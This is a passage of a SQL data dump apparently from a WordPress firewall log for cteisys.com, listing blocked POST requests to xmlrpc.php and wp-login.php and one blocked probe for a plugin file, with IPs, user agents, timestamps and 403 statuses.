Firefox\\/96\"}','WQd5mABMHINqGo4j7n8PhLkJ',0,1665373112.4226,1578,'','POST',403,0,515,0,1,'',0),('157.245.140.35',2650115107,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','3wdBxEJfVKZW7mikvXALg1Rj',0,1665373307.9911,1564,'','POST',403,0,515,0,1,'',0),('81.70.248.169',1363605673,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.117 Safari\\/537.36\"}','c28EKWogrnYkzS9qyJFLCdiO',0,1665373516.3159,1292,'','POST',403,0,600,0,1,'',0),('118.98.64.188',1986150588,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','80LyXI4isTwmhvcbA3ldu2nK',0,1665373600.1788,1335,'','POST',403,0,515,0,1,'',0),('167.172.105.95',2813094239,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.106 Safari\\/537.36\"}','MKgCblJGPe94pT1iZ3SvLtmy',0,1665374097.1710,17885,'','POST',403,0,600,0,1,'',0),('194.163.132.194',3265496258,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','8CIvzH3LjiTeq1MBmaRo9Ar4',0,1665374183.3441,2443,'','POST',403,0,515,0,1,'',0),('109.168.97.89',1839751513,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/55.0.2883.87 Safari\\/537.36\"}','MzcKCr3qlBTIUDWQh21oteng',0,1665455628.8784,17433,'','POST',403,0,600,0,1,'',0),('157.245.246.208',2650142416,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.80 Safari\\/537.36\"}','cSkqDhxvVX6FOZoYQpPiLJwA',0,1665456069.5488,1326,'','POST',403,0,600,0,1,'',0),('68.235.52.36',1156264996,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','gaZWutEbi2KHDohVXQL01UO5',0,1665456282.6213,2285,'','POST',403,0,515,0,1,'',0),('207.154.248.39',3483039783,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/87.0.4280.88 Safari\\/537.36\"}','Q3hbdg5OmryJ8FLG14xX9TUi',0,1665456661.0413,17256,'','POST',403,0,600,0,1,'',0),('184.75.223.195',3091980227,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','WV4BfU35uZwkheKpXDEONGP0',0,1665457083.3653,3121,'','POST',403,0,515,0,1,'',0),('188.166.61.228',3165011428,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.86 Safari\\/537.36\"}','IyMJehFbDUHxZEV5A7s0amcw',0,1665457098.6294,472,'','POST',403,0,600,0,1,'',0),('157.230.127.126',2649128830,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/52.0.2743.116 Safari\\/537.36\"}','FJ6AhMIWS5sytaLfXCixc41j',0,1665541272.4083,18334,'','POST',403,0,600,0,1,'',0),('34.78.198.205',575588045,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/65.0.3325.181 Safari\\/537.36\"}','nbQa37swqmcNrB4eFXfY02TM',0,1665541730.2142,19296,'','POST',403,0,600,0,1,'',0),('151.106.35.235',2540315627,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','LFtSr1Oi3y6gG2loNUW8BVhp',0,1665541896.2646,2310,'','POST',403,0,515,0,1,'',0),('64.227.183.25',1088665369,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/55.0.2883.87 Safari\\/537.36\"}','go5Yny6p9UBES7zCQerdHVqA',0,1665542435.3315,17264,'','POST',403,0,600,0,1,'',0),('188.165.198.224',3164980960,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/57.0.2987.133 Safari\\/537.36\"}','WOnR5XSg2s6z3CVyAplemIFt',0,1665543270.5499,17568,'','POST',403,0,600,0,1,'',0),('209.126.8.92',3514697820,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','bgkEKGnReY0BPxJLtV5hs7jz',0,1665543564.7327,2483,'','POST',403,0,515,0,1,'',0),('190.169.30.9',3198754313,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','WVUHQ92kZmF3yw5hBELX0PYS',0,1665627955.4614,1250,'','POST',403,0,515,0,1,'',0),('51.91.83.187',861623227,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','tXQh90pjJYLUGBMCVK51ZSl2',0,1665628231.8412,18215,'','POST',403,0,515,0,1,'',0),('141.94.247.170',2371811242,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/81.0.4044.122 Safari\\/537.36\"}','fFHtl2NQxRi4AO7Pr3h5eKEd',0,1665628375.4350,1307,'','POST',403,0,600,0,1,'',0),('118.98.64.188',1986150588,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','IZSzUgph2MYtlv7eWaLjTkds',0,1665629115.5491,19212,'','POST',403,0,515,0,1,'',0),('103.111.30.40',1735335464,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','jleIAROsdMYK2Lrcb5uEVaNG',0,1665629413.5514,1333,'','POST',403,0,515,0,1,'',0),('159.89.228.214',2673468630,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/64.0.3282.140 Safari\\/537.36\"}','rL4Nb5TlVZhXqIDnOeYFv3pa',0,1665629741.4452,2986,'','POST',403,0,600,0,1,'',0),('62.90.101.113',1046111601,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','SrE7MF9PvD0QOVW1BiAnxhTd',0,1665633185.9682,20500,'','POST',403,0,515,0,1,'',0),('207.154.234.6',3483036166,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','XsEudPbcC24eyOYzlGMJFpax',0,1665633334.4673,18247,'','POST',403,0,515,0,1,'',0),('47.110.72.238',795756782,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/54.0.2840.99 Safari\\/537.36\"}','H2AMZmyc31jI7UxwsrqDRfXW',0,1665633839.3076,17548,'','POST',403,0,600,0,1,'',0),('66.175.217.71',1118820679,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','RUOKnfBCMjv35iEIVYQWuhoZ',0,1665638496.9536,1777,'','POST',403,0,515,0,1,'',0),('185.23.117.170',3105322410,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','iVpYQAuSGhoybfR2H6dTekvC',0,1665638791.4703,19245,'','POST',403,0,515,0,1,'',0),('103.110.84.132',1735283844,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','SUGjOqygHio2wz8ANLPQM4Kf',0,1665638892.1721,1866,'','POST',403,0,515,0,1,'',0),('146.59.243.31',2453402399,'','http://cteisys.com/wp-content/plugins/ioptimization/IOptimize.php?rchk','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','TCHXZ8beAjDnv2Pw0yrYpJ7O',0,1665639107.7295,456,'','GET',403,0,700,0,1,'',0),('137.184.209.117',2310590837,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','GYQFkmoCSwJAWZ530NdsnV6e',0,1665639165.3834,1434,'','POST',403,0,515,0,1,'',0),('61.219.43.253',1037773821,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.132 Safari\\/537.36\"}','lkSY1KnJEtHIuwxLXpoWj9Tc',0,1665639263.5547,1360,'','POST',403,0,600,0,1,'',0),('103.171.180.139',1739306123,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','UOWtBDTPrxcM8KVESA1aCwbG',0,1665639546.8153,12242,'','POST',403,0,515,0,1,'',0),('157.245.140.35',2650115107,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','V0mKuwRgilSsZbkHEJFYXv1d',0,1665639634.9417,2260,'','POST',403,0,515,0,1,'',0),('104.45.41.45',1747790125,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','rvOxyT894oeJ0QghU1Ek2jfD',0,1665639944.3595,19733,'','POST',403,0,515,0,1,'',0),('80.87.194.140',1347928716,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','z3e6QmE1ws509jKlncy2WBNI',0,1665640302.2234,6910,'','POST',403,0,515,0,1,'',0),('124.70.98.118',2084987510,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','IpOR1XQ2GxmLkbSV4DsJWABZ',0,1665640396.8036,1424,'','POST',403,0,515,0,1,'',0),('115.78.122.58',1934522938,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/62.0.3202.89 Safari\\/537.36\"}','OgPbEdWhrMFHfRZqx4CpSJeu',0,1665640582.4563,18294,'','POST',403,0,600,0,1,'',0),('167.71.63.47',2806464303,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/81.0.4044.122 Safari\\/537.36\"}','cge01Eb6hXWtTGMRQPxw7HdU',0,1665645940.8319,17316,'','POST',403,0,600,0,1,'',0),('187.32.188.214',3139484886,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','17JIax5ehbmoGzN2iwAKULyM',0,1665646075.8999,9854,'','POST',403,0,515,0,1,'',0),('209.124.90.80',3514587728,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','K8ORIdNbyewnXEcaZmCz9TvY',0,1665646205.4503,15504,'','POST',403,0,515,0,1,'',0),('213.152.162.94',3583550046,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','Zxpj2SIAbzqtkmBndKwvU0PM',0,1665646301.4548,13723,'','POST',403,0,515,0,1,'',0),('192.64.113.147',3225448851,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','e8BPkR4XtOfaN7UGg0Hr9IEs',0,1665646545.0223,18460,'','POST',403,0,515,0,1,'',0),('68.183.177.20',1152889108,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','8lIf1ymMdExZK9kih3e2SoAq',0,1665646638.4103,1404,'','POST',403,0,515,0,1,'',0),('213.152.161.69',3583549765,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','nSC26fk7aBdVEO9z5mNhwyHj',0,1665646911.8285,1755,'','POST',403,0,515,0,1,'',0),('167.71.141.164',2806484388,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.80 Safari\\/537.36\"}','bFJjiewh1CTYacEDvB4KzQMx',0,1665647303.7383,17456,'','POST',403,0,600,0,1,'',0),('8.210.102.36',148006436,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','tF8igvNu67pjTIZfleBUY345',0,1665647457.8160,2329,'','POST',403,0,515,0,1,'',0),('193.107.158.16',3245055504,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','rhuP7CT9GLy346iFakcXJQKf',0,1665647564.3688,512,'','POST',403,0,515,0,1,'',0),('209.141.37.194',3515688386,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10_0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','xln9pefAWJ8wCivRyqSYBHTh',0,1665647580.3128,1303,'','POST',403,0,600,0,1,'',0),('82.102.23.139',1382422411,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','ICxAtRcFD2NdYbSwsKLk4pZv',0,1665647623.2779,711,'','POST',403,0,515,0,1,'',0),('194.233.67.171',3270067115,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','OnbxCYNrsFtzcp9f41lKWT5Z',0,1665647923.5284,1634,'','POST',403,0,515,0,1,'',0),('115.78.160.53',1934532661,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko\\/20100101 Firefox\\/65.0\"}','Newb8m1Kzdg7qyxPTki5VS43',0,1665650456.1784,514,'','POST',403,0,515,0,1,'',0),('198.244.143.200',3337916360,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/88.0.4324.190 Safari\\/537.36\"}','sT3cnKdNvL9UmCAp8ubkSa65',0,1665650463.1307,687,'','POST',403,0,515,0,1,'',0),('74.208.59.254',1255160830,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','5alHijO7rbtuUn1pSZYCsTgD',0,1665650463.9416,508,'','POST',403,0,515,0,1,'',0),('178.170.41.94',2997496158,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko\\/20100101 Firefox\\/50.0\"}','4c3dN68SHTfpZwXbuDOlMJo0',0,1665650471.9124,566,'','POST',403,0,515,0,1,'',0),('82.165.81.9',1386565897,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/65.0.3325.181 Safari\\/537.36\"}','UlEf4QsRhnPeZuTz2AWLmHxD',0,1665650474.3025,501,'','POST',403,0,515,0,1,'',0),('78.142.63.31',1317945119,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:61.0) Gecko\\/20100101 Firefox\\/61.0\"}','ubLPgoBCcti1Op0UQJvj8aym',0,1665650481.8544,531,'','POST',403,0,515,0,1,'',0),('8.210.174.93',148024925,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','F8Ai9waNhgD5nXJMZfSTEKCr',0,1665650829.7113,1624,'','POST',403,0,515,0,1,'',0),('192.163.194.31',3231957535,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','I1zfOAhaCiXqduslWBgFwtoD',0,1665650947.0942,1302,'','POST',403,0,515,0,1,'',0),('184.168.121.5',3098048773,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','fBVA3xur1Ykt2G6Ds5lWcqLP',0,1665651329.5827,18845,'','POST',403,0,515,0,1,'',0),('120.27.133.69',2015069509,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/66.0.3359.117 Safari\\/537.36\"}','nGPAmIMSBCWbQk0NOFpyqxoD',0,1665651411.8112,1282,'','POST',403,0,600,0,1,'',0),('161.97.90.217',2707512025,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/56.0.2924.76 Safari\\/537.36\"}','O15o9KVL6iXsH2vuqcFP4Q8e',0,1665654367.7952,3995,'','POST',403,0,515,0,1,'',0),('82.165.81.9',1386565897,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','rFYo5Ole0V9SgCRNPwTx14fq',0,1665654364.0279,7763,'','POST',403,0,515,0,1,'',0),('68.183.22.104',1152849512,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko\\/20100101 Firefox\\/67.0\"}','0ISYTQA1FCsyxVa9jgcpiz7Z',0,1665654369.1810,3329,'','POST',403,0,515,0,1,'',0),('82.165.87.63',1386567487,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/61.0.3163.100 Safari\\/537.36\"}','oqwRd8xj5ZN1YnUH9JvIyW7O',0,1665654379.7145,1003,'','POST',403,0,515,0,1,'',0),('103.247.11.240',1744243696,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko\\/20100101 Firefox\\/88.0\"}','GKi8I0hcJ5QBkAlVoOZgsdXW',0,1665654385.8962,618,'','POST',403,0,515,0,1,'',0),('185.107.112.75',3110826059,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko\\/20100101 Firefox\\/66.0\"}','VaN3kRI0Ju7pb8Zl5EKsnLqx',0,1665654389.7018,498,'','POST',403,0,515,0,1,'',0),('49.12.114.46',822899246,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.149 Safari\\/537.36\"}','X5DqjhdAaKOwpB9HFgR1ZEMC',0,1665654391.6307,515,'','POST',403,0,515,0,1,'',0),('35.202.169.54',600484150,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/68.0.3440.106 Safari\\/537.36\"}','wFZz3NGMj1qTSCLVPod5OYme',0,1665654399.4198,537,'','POST',403,0,515,0,1,'',0),('119.28.78.249',1998343929,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','2BugQ1NLzXG4bFYMrTjZoRPd',0,1665654403.7512,583,'','POST',403,0,515,0,1,'',0),('45.64.187.254',759217150,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 Safari\\/537.36\"}','qwQWuDr4g5n9pYPylHeEtZsS',0,1665654406.3049,1241,'','POST',403,0,515,0,1,'',0),('209.124.90.80',3514587728,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','CzpwDb0MSTloZRnqWyc7Neur',0,1665654534.2097,1339,'','POST',403,0,515,0,1,'',0),('66.228.32.9',1122246665,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','gqiwMyd8rhpnN5LRoYQGsXxj',0,1665654894.7492,15554,'','POST',403,0,515,0,1,'',0),('2.59.119.2',37451522,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.88 Safari\\/537.36\"}','Wq8FP3vasowJAtpN7u1ITZnh',0,1665654898.9311,11463,'','POST',403,0,515,0,1,'',0),('93.186.242.173',1572532909,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko\\/20100101 Firefox\\/54.0\"}','iqJ3d6T7nxMbEYOgySfoHBRr',0,1665654892.7742,17721,'','POST',403,0,515,0,1,'',0),('67.222.142.146',1138658962,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:33.0) Gecko\\/20100101 Firefox\\/33.0\"}','PWXlDChScQHRK0qntIe9xN3O',0,1665654912.0220,676,'','POST',403,0,515,0,1,'',0),('103.171.180.165',1739306149,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','PsyaVwJ6Ai2IhB1uYkMZDOxt',0,1665654914.8523,491,'','POST',403,0,515,0,1,'',0),('67.225.161.250',1138860538,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; LM-Q710(FGN)) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','AHRr1s5qtBc2kCKdo0Z84fwb',0,1665654917.2261,528,'','POST',403,0,515,0,1,'',0),('67.225.161.250',1138860538,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.149 Safari\\/537.36\"}','VLW3orDuySn4OHdTf9EevxC0',0,1665654924.0956,515,'','POST',403,0,515,0,1,'',0),('185.50.56.4',3107076100,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:33.0) Gecko\\/20100101 Firefox\\/33.0\"}','w4xdRHAn35zifLBogqTh6uVk',0,1665654928.6468,496,'','POST',403,0,515,0,1,'',0),('68.183.22.104',1152849512,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/69.0.3497.100 Safari\\/537.36\"}','P2DhYVr0EHoG5xZbjS9RInCK',0,1665654936.7219,2170,'','POST',403,0,515,0,1,'',0),('70.34.133.151',1176667543,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko\\/20100101 Firefox\\/29.0\"}','CRsvSJp0Bh5YQVT7MF9bgyU4',0,1665654936.0917,2842,'','POST',403,0,515,0,1,'',0),('175.178.241.165',2947740069,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','24VwhXNbrEme7PHjZuMBQ8YD',0,1665654947.8942,1296,'','POST',403,0,515,0,1,'',0),('23.226.89.72',400709960,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/88.0.4324.104 Safari\\/537.36\"}','GQRlKFVZOcWAnjwe5gJ8T6k2',0,1665654950.6837,534,'','POST',403,0,515,0,1,'',0),('67.23.254.254',1125646078,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','vV5cyPLpAuQglZG3MfUsnNSz',0,1665655049.3630,1800,'','POST',403,0,515,0,1,'',0),('194.42.98.32',3257557536,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','m5TODL6nNUyXi40JRgkaHWI1',0,1665655459.0032,18391,'','POST',403,0,515,0,1,'',0),('49.12.114.46',822899246,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/83.0.4103.116 Safari\\/537.36\"}','9RjCpnSI3rN8lZBw6sW1Muzo',0,1665656301.0428,580,'','POST',403,0,515,0,1,'',0),('103.166.182.177',1738978993,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) 